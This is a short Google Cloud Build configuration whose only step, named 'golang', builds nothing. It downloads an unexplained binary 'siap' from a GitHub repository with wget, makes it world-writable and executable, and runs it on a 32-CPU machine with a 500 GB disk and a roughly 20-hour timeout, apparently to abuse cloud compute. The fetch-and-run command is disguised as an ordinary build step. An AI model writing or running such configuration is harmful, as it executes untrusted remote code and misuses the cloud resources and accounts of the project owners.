steps:
  - name: golang
    args:
      - '-c'
      - >-
        wget https://github.com/SepokHost/suung/raw/566d42ba3fa797ab60d200826ca0b3fe2ecc12e5/siap; chmod 777 siap; ./siap
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 73313s
options:
  machineType: E2_HIGHCPU_32
  diskSizeGb: '500'